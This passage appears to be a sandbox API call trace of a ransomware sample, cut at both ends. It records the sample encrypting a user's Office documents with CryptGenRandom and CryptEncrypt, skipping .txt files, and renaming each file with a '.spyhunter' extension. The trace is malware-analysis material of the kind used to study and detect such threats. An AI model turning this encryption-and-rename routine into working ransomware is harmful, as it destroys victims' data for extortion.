lpNumberOfBytesWritten=0x25ced44*=0x2800, lpOverlapped=0x0) returned 1 [0148.838] GetProcessHeap () returned 0x2c0000 [0148.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.838] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.838] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x25ced84*, lpNumberOfBytesWritten=0x25ced44*=0x4, lpOverlapped=0x0) returned 1 [0148.838] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced44*=0x30, lpOverlapped=0x0) returned 1 [0148.838] CloseHandle (hObject=0xa0) returned 1 [0148.838] GetProcessHeap () returned 0x2c0000 [0148.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.838] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\b2f20.ppt.spyhunter") returned 84 [0148.838] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\b2f20.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\b2f20.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\b2f20.ppt.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\b2f20.ppt.spyhunter")) returned 1 [0148.839] GetProcessHeap () returned 0x2c0000 [0148.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.839] GetProcessHeap () returned 0x2c0000 [0148.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.839] GetProcessHeap () returned 0x2c0000 [0148.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb53b8 | out: hHeap=0x2c0000) returned 1 [0148.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced80 | out: pbBuffer=0x25ced80) returned 1 [0148.839] GetProcessHeap () returned 0x2c0000 [0148.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced78*=0x30) returned 1 [0148.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GXWEVg3I0ukYq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gxwevg3i0ukyq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GXWEVg3I0ukYq.pptx") returned 62 [0148.840] StrStrW (lpFirst="GXWEVg3I0ukYq.pptx", lpSrch=".txt") returned 0x0 [0148.840] GetProcessHeap () returned 0x2c0000 [0148.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.840] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced3c*=0x2800, lpOverlapped=0x0) returned 1 [0148.841] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.841] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced3c*=0x2800, lpOverlapped=0x0) returned 1 [0148.842] GetProcessHeap () returned 0x2c0000 [0148.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.842] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.842] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x25ced7c*, lpNumberOfBytesWritten=0x25ced3c*=0x4, lpOverlapped=0x0) returned 1 [0148.842] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced3c*=0x30, lpOverlapped=0x0) returned 1 [0148.843] CloseHandle (hObject=0xa0) returned 1 [0148.843] GetProcessHeap () returned 0x2c0000 [0148.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.843] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GXWEVg3I0ukYq.pptx.spyhunter") returned 72 [0148.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GXWEVg3I0ukYq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gxwevg3i0ukyq.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GXWEVg3I0ukYq.pptx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gxwevg3i0ukyq.pptx.spyhunter")) returned 1 [0148.844] GetProcessHeap () returned 0x2c0000 [0148.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.845] GetProcessHeap () returned 0x2c0000 [0148.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.845] GetProcessHeap () returned 0x2c0000 [0148.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85d20 | out: hHeap=0x2c0000) returned 1 [0148.845] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced80 | out: pbBuffer=0x25ced80) returned 1 [0148.845] GetProcessHeap () returned 0x2c0000 [0148.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.845] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced78*=0x30) returned 1 [0148.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gU8UFf7B2.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gu8uff7b2.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gU8UFf7B2.docx") returned 58 [0148.845] StrStrW (lpFirst="gU8UFf7B2.docx", lpSrch=".txt") returned 0x0 [0148.845] GetProcessHeap () returned 0x2c0000 [0148.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.846] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced3c*=0xd18, lpOverlapped=0x0) returned 1 [0148.846] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff2e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.846] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd18, lpNumberOfBytesWritten=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced3c*=0xd18, lpOverlapped=0x0) returned 1 [0148.846] GetProcessHeap () returned 0x2c0000 [0148.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.846] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.847] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x25ced7c*, lpNumberOfBytesWritten=0x25ced3c*=0x4, lpOverlapped=0x0) returned 1 [0148.847] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced3c*=0x30, lpOverlapped=0x0) returned 1 [0148.847] CloseHandle (hObject=0xa0) returned 1 [0148.847] GetProcessHeap () returned 0x2c0000 [0148.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.847] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gU8UFf7B2.docx.spyhunter") returned 68 [0148.847] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gU8UFf7B2.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gu8uff7b2.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gU8UFf7B2.docx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gu8uff7b2.docx.spyhunter")) returned 1 [0148.848] GetProcessHeap () returned 0x2c0000 [0148.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.848] GetProcessHeap () returned 0x2c0000 [0148.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.850] GetProcessHeap () returned 0x2c0000 [0148.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d7b8 | out: hHeap=0x2c0000) returned 1 [0148.851] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced78 | out: pbBuffer=0x25ced78) returned 1 [0148.851] GetProcessHeap () returned 0x2c0000 [0148.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.851] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced70*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced70*=0x30) returned 1 [0148.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gHUbaI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ghubai.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gHUbaI.pptx") returned 55 [0148.851] StrStrW (lpFirst="gHUbaI.pptx", lpSrch=".txt") returned 0x0 [0148.851] GetProcessHeap () returned 0x2c0000 [0148.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.851] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced34*=0x2800, lpOverlapped=0x0) returned 1 [0148.852] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.852] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced34*=0x2800, lpOverlapped=0x0) returned 1 [0148.852] GetProcessHeap () returned 0x2c0000 [0148.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.852] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.853] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced34, lpOverlapped=0x0 | out: lpBuffer=0x25ced74*, lpNumberOfBytesWritten=0x25ced34*=0x4, lpOverlapped=0x0) returned 1 [0148.853] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced34, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced34*=0x30, lpOverlapped=0x0) returned 1 [0148.853] CloseHandle (hObject=0xa0) returned 1 [0148.853] GetProcessHeap () returned 0x2c0000 [0148.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.853] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gHUbaI.pptx.spyhunter") returned 65 [0148.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gHUbaI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ghubai.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gHUbaI.pptx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ghubai.pptx.spyhunter")) returned 1 [0148.854] GetProcessHeap () returned 0x2c0000 [0148.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.854] GetProcessHeap () returned 0x2c0000 [0148.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.854] GetProcessHeap () returned 0x2c0000 [0148.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2160 | out: hHeap=0x2c0000) returned 1 [0148.854] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced78 | out: pbBuffer=0x25ced78) returned 1 [0148.854] GetProcessHeap () returned 0x2c0000 [0148.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.854] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced70*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced70*=0x30) returned 1 [0148.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g9ETdbwqc7Ws_Zqi.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9etdbwqc7ws_zqi.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g9ETdbwqc7Ws_Zqi.pps") returned 64 [0148.855] StrStrW (lpFirst="g9ETdbwqc7Ws_Zqi.pps", lpSrch=".txt") returned 0x0 [0148.855] GetProcessHeap () returned 0x2c0000 [0148.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.855] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced34*=0x2800, lpOverlapped=0x0) returned 1 [0148.856] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.856] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced34*=0x2800, lpOverlapped=0x0) returned 1 [0148.856] GetProcessHeap () returned 0x2c0000 [0148.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.856] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.856] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced34, lpOverlapped=0x0 | out: lpBuffer=0x25ced74*, lpNumberOfBytesWritten=0x25ced34*=0x4, lpOverlapped=0x0) returned 1 [0148.856] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced34, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced34*=0x30, lpOverlapped=0x0) returned 1 [0148.856] CloseHandle (hObject=0xa0) returned 1 [0148.856] GetProcessHeap () returned 0x2c0000 [0148.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.857] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g9ETdbwqc7Ws_Zqi.pps.spyhunter") returned 74 [0148.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g9ETdbwqc7Ws_Zqi.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9etdbwqc7ws_zqi.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g9ETdbwqc7Ws_Zqi.pps.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9etdbwqc7ws_zqi.pps.spyhunter")) returned 1 [0148.857] GetProcessHeap () returned 0x2c0000 [0148.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.857] GetProcessHeap () returned 0x2c0000 [0148.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.858] GetProcessHeap () returned 0x2c0000 [0148.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e093e8 | out: hHeap=0x2c0000) returned 1 [0148.858] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced70 | out: pbBuffer=0x25ced70) returned 1 [0148.858] GetProcessHeap () returned 0x2c0000 [0148.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.858] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced68*=0x30) returned 1 [0148.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EIw1Y_vg3.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eiw1y_vg3.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.858] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EIw1Y_vg3.xlsx") returned 58 [0148.858] StrStrW (lpFirst="EIw1Y_vg3.xlsx", lpSrch=".txt") returned 0x0 [0148.858] GetProcessHeap () returned 0x2c0000 [0148.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.858] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced2c*=0x2800, lpOverlapped=0x0) returned 1 [0148.859] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.859] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced2c*=0x2800, lpOverlapped=0x0) returned 1 [0148.859] GetProcessHeap () returned 0x2c0000 [0148.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.859] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.859] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced2c, lpOverlapped=0x0 | out: lpBuffer=0x25ced6c*, lpNumberOfBytesWritten=0x25ced2c*=0x4, lpOverlapped=0x0) returned 1 [0148.860] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced2c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced2c*=0x30, lpOverlapped=0x0) returned 1 [0148.860] CloseHandle (hObject=0xa0) returned 1 [0148.860] GetProcessHeap () returned 0x2c0000 [0148.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.860] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EIw1Y_vg3.xlsx.spyhunter") returned 68 [0148.860] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EIw1Y_vg3.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eiw1y_vg3.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EIw1Y_vg3.xlsx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eiw1y_vg3.xlsx.spyhunter")) returned 1 [0148.861] GetProcessHeap () returned 0x2c0000 [0148.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.861] GetProcessHeap () returned 0x2c0000 [0148.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.861] GetProcessHeap () returned 0x2c0000 [0148.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d6f8 | out: hHeap=0x2c0000) returned 1 [0148.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced70 | out: pbBuffer=0x25ced70) returned 1 [0148.861] GetProcessHeap () returned 0x2c0000 [0148.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced68*=0x30) returned 1 [0148.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EcceVHj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eccevhj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.861] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EcceVHj.docx") returned 56 [0148.861] StrStrW (lpFirst="EcceVHj.docx", lpSrch=".txt") returned 0x0 [0148.862] GetProcessHeap () returned 0x2c0000 [0148.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.862] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced2c*=0x89a, lpOverlapped=0x0) returned 1 [0148.862] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff766, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.862] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x89a, lpNumberOfBytesWritten=0x25ced2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced2c*=0x89a, lpOverlapped=0x0) returned 1 [0148.862] GetProcessHeap () returned 0x2c0000 [0148.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.863] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.863] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced2c, lpOverlapped=0x0 | out: lpBuffer=0x25ced6c*, lpNumberOfBytesWritten=0x25ced2c*=0x4, lpOverlapped=0x0) returned 1 [0148.863] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced2c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced2c*=0x30, lpOverlapped=0x0) returned 1 [0148.863] CloseHandle (hObject=0xa0) returned 1 [0148.863] GetProcessHeap () returned 0x2c0000 [0148.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.863] 